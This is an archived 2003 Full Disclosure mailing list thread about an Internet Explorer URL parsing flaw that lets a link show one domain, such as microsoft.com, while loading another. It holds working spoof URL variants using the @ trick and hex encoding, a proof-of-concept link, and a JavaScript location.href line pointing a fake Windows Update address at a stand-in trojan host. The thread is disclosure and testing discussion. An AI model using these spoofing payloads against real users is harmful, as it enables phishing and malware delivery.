Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: RE: FWD: Internet Explorer URL parsing vulnerability

From: "VeNoMouS" <venom () gen-x co nz>
Date: Wed, 10 Dec 2003 18:03:00 +1300
RE: FWD: Internet Explorer URL parsing vulnerabilityumm tested this you dont need %01 either btw.

www.microsoft.com () www linux org

was messing around with some hex stile as well is there a way to call a file:// inside a http:// becos the issue with 
doing the @ trick is it appends http:// automaticly, mind you , u could just make it exec some vb code or something on 
a site, just a random idea any way

and it dont also seem to work if you use hex as well for the full domain ie

www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67

nor  www.microsoft.com%40www.linux.org

where as if you www.microsoft.com@%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works






----- Original Message ----- 
  From: Julian HO Thean Swee 
  To: 'full-disclosure () lists netsys com' 
  Sent: Wednesday, December 10, 2003 4:22 PM
  Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability


  Hmm, it doesn't seem to work on my browser :) 
  I don't even get transported to any page when i click the button. 
  But then again, i have everything turned off in the internet zone by default... 
  (but my submit non-encrypted form data is on) 

  Does it really work then?  it looks like it's using javascript...? (location.href) 
  Merry Christmas everyone :) 

    --__--__-- 

    Message: 1 
    Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
    From: S G Masood <sgmasood () yahoo com> 
    To: full-disclosure () lists netsys com 
    Subject: [Full-disclosure] RE: FWD: Internet Explorer URL parsing vulnerability 



    LOL. This is so simple and dangerous, it almost made 
    me laugh and cry at the same time. Most of you will 
    realise why...;D 
    The Paypal, AOL, Visa, Mastercard, et al email 
    scammers will have a harvest of gold this month with 
    lots of zombies falling for this simple technique. 

    ># POC ########## 
    >http://www.zapthedingbat.com/security/ex01/vun1.htm 

    Dont be surprised if your latest download from 
    http://www.microsoft.com turns out to be a trojan! 

    location.href=unescape('http://windowsupdate.microsoft.com%01 () comedownloadaneviltrojanfromme com); 



    -- 
    S.G.Masood 

    Hyderabad, 
    India 

    PS: One more thing - no scripting required to exploit this. 

    __________________________________ 
    Do you Yahoo!? 
    Free Pop-Up Blocker - Get it now 
    http://companion.yahoo.com/ 



  This email is confidential and privileged.  If you are not the intended recipient, you must not view, disseminate, 
use or copy this email. Kindly notify the sender immediately, and delete this email from your system. Thank you.

  Please visit our website at www.starhub.com
Previous By Date Next
Previous By Thread Next

Current thread: